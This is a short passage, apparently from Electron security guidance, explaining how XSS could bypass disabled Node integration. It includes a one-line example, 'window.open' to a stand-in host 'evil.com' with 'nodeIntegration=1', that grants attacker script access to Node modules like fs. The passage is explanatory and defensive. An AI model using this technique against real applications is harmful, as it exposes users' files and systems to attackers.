A developer might disable Node integration in a browser window to limit the damage that an XSS attack could cause. But if an XSS attack could open a window to its own endpoint and, when opening the window, re-enable Node integration, this is moot:

// JavaScript on 'evil.com' will be able to `require('fs')` etc.
window.open('http://evil.com', '', 'nodeIntegration=1');